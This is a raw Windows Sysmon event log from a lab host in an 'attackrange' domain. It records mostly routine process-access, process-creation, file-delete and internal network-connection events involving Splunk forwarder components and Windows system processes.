18:15:13.835{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.835{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.835{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.835{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F31-613A-5E90-03000000C801}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.835{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F31-613A-5E90-03000000C801}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.820{B81B27B7-4F31-613A-5E90-03000000C801}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.788{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D69938EEE596154E01694D5E62D7F901,SHA256=A9E3120EE9599E1B55BDEB1D1AD91893B804E8AAB1097E44AF439D5432617435,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:37.695{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56716-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035085285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.372{B81B27B7-4F31-613A-5D90-03000000C801}44641424C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.155{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F31-613A-5D90-03000000C801}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.155{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.155{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.155{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.155{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.155{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F31-613A-5D90-03000000C801}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.155{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F31-613A-5D90-03000000C801}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.150{B81B27B7-4F31-613A-5D90-03000000C801}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:14.810{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90D0B677A9E6DC0F4624C9764C410B42,SHA256=739FA86B351BAA48022D4C0EF94373A561CFB47F2ADFC5E0CB9F016C2E49CB5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:14.154{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D7C73A63035778BC9C6ADF6D2E8EF6C,SHA256=9CF82C9D92D6EBE527D251DF191299220859B9C77CA6955D1DFB9CCFB4D2F93C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:14.154{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9295017DD30BC06A1C3664A35146EF97,SHA256=D6355494B9112B5B80895CF65A0CACF8B324E881FA5B276E439B2F42C77CE76E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:15.824{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F816C433FDF3A2970240AF11B3413D89,SHA256=10A8703A47D4373A1A7B371165B02FD1B8E210B5C539A5AB184CE6CDFD46B125,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:16.825{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2149FE2469C806ADBA90B0761B96E191,SHA256=376631BA6759CBE6B3A41EFFD2F23A280DFC7474873FE71609D76A6C95DC6D64,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:17.858{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AE43723AAF2356053FBB4B46DBADCCC,SHA256=0E2DE5404235B565DDAB6CC2CCD24CC996B63A8FDAEB1A301D77CEC3E4D9EF80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:42.101{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56717-false10.0.1.12-8000- 10341000x800000000000000035085331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 